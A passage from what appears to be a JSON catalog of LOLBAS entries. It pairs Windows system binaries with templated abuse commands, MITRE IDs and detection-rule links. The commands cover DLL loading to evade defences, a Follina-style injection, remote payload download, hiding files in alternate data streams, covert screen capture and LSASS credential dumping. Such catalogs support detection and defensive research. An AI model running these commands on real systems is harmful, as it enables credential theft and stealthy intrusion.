08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:odbcconf-exe:1","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf INSTALLDRIVER \"lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2\"\nodbcconf configsysdsn \"lolbas-project\" \"DSN=lolbas-project\"","description":"Install a driver and load the DLL. Requires administrator privileges.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:odbcconf-exe:2","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf -f {PATH:.rsp}","description":"Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:offlinescannershell-exe:0","toolId":"lolbas:offlinescannershell-exe","toolName":"OfflineScannerShell.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OfflineScannerShell","description":"Execute mpclient.dll library in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml"},{"type":"IOC","value":"OfflineScannerShell.exe should not be run on a normal workstation"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"]},{"id":"lolbas:onedrivestandaloneupdater-exe:0","toolId":"lolbas:onedrivestandaloneupdater-exe","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"OneDriveStandaloneUpdater","description":"Download a file from the web address specified in `HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json`.","usecase":"Download a file from the Internet without executing any anomalous executables with suspicious arguments","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/153","https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"]},{"id":"lolbas:pcalua-exe:0","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH:.exe}","description":"Open the target .EXE using the Program Compatibility Assistant.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcalua-exe:1","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_SMB:.dll}","description":"Open the target .DLL file with the Program Compatibilty Assistant.","usecase":"Proxy execution of remote dll file","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcalua-exe:2","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java","description":"Open the target .CPL file with the Program Compatibility Assistant.","usecase":"Execution of CPL files","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcwrun-exe:0","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe {PATH_ABSOLUTE:.exe}","description":"Open the target .EXE file with the Program Compatibility Wizard.","usecase":"Proxy execution of binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"]},{"id":"lolbas:pcwrun-exe:1","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe /../../$(calc).exe","description":"Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"]},{"id":"lolbas:pktmon-exe:0","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe start --etw","description":"Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop","usecase":"use this a built in network sniffer on windows 10 to capture senstive traffic","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"]},{"id":"lolbas:pktmon-exe:1","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe filter add -p 445","description":"Select Desired ports for packet capture","usecase":"Look for interesting traffic such as telent or FTP","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"]},{"id":"lolbas:pnputil-exe:0","toolId":"lolbas:pnputil-exe","toolName":"Pnputil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pnputil.exe -i -a {PATH_ABSOLUTE:.inf}","description":"Used for installing drivers","usecase":"Add malicious driver","mitre":["T1547"],"privilege":"admin","fullPath":["C:\\Windows\\system32\\pnputil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"]},{"id":"lolbas:presentationhost-exe:0","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Presentationhost.exe {PATH_ABSOLUTE:.xbap}","description":"Executes the target XAML Browser Application (XBAP) file","usecase":"Execute code within XBAP files","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"]},{"id":"lolbas:presentationhost-exe:1","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Presentationhost.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"]},{"id":"lolbas:print-exe:0","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}","description":"Copy file.exe into the Alternate Data Stream (ADS) of file.txt.","usecase":"Hide binary file in alternate data stream to potentially bypass defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:print-exe:1","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}","description":"Copy file from source to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:print-exe:2","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}","description":"Copy File.exe from a network share to the target c:\\OutFolder\\outfile.exe.","usecase":"Copy/Download file from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:printbrm-exe:0","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}","description":"Create a ZIP file from a folder in a remote drive","usecase":"Exfiltrate the contents of a remote folder on a UNC share into a zip file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"]},{"id":"lolbas:printbrm-exe:1","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}","description":"Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder","usecase":"Decompress and extract a ZIP file stored on an alternate data stream to a new folder","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"]},{"id":"lolbas:provlaunch-exe:0","toolId":"lolbas:provlaunch-exe","toolName":"Provlaunch.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"provlaunch.exe LOLBin","description":"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.","usecase":"Executes arbitrary command","mitre":["T1218"],"privilege":"admin","fullPath":["c:\\windows\\system32\\provlaunch.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"},{"type":"IOC","value":"c:\\windows\\system32\\provlaunch.exe executions"},{"type":"IOC","value":"Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys"}],"references":["https://twitter.com/0gtweet/status/1674399582162153472","https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"]},{"id":"lolbas:psr-exe:0","toolId":"lolbas:psr-exe","toolName":"Psr.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0","description":"Record a user screen without creating a GUI. You should use \"psr.exe /stop\" to stop recording and create output file.","usecase":"Can be used to take screenshots of the user environment","mitre":["T1113"],"privilege":"user","fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"},{"type":"IOC","value":"psr.exe spawned"},{"type":"IOC","value":"suspicious activity when running with \"/gui 0\" flag"}],"references":["https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx","https://lolbas-project.github.io/lolbas/Binaries/Psr/"]},{"id":"lolbas:query-exe:0","toolId":"lolbas:query-exe","toolName":"Query.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"query.exe user","description":"Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"query.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"]},{"id":"lolbas:rasautou-exe:0","toolId":"lolbas:rasautou-exe","toolName":"Rasautou.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rasautou -d {PATH:.dll} -p export_name -a a -e e","description":"Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\rasautou.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml"},{"type":"IOC","value":"rasautou.exe command line containing -d and -p"}],"references":["https://github.com/fireeye/DueDLLigence","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"]},{"id":"lolbas:rdrleakdiag-exe:0","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump process by PID.","mitre":["T1003"],"privilege":"user","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:rdrleakdiag-exe:1","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:rdrleakdiag-exe:2","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap","description":"After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process mutliple times.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"]},{"id":"lolbas:reg-exe:0","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"reg export HKLM\\SOFTWARE\\Microsoft\\Evilreg {PATH_ABSOLUTE}:evilreg.reg","description":"Export the target Registry key and save it to the specified .REG file within an Alternate data stream.","usecase":"Hide/plant registry information in Alternate data stream for later 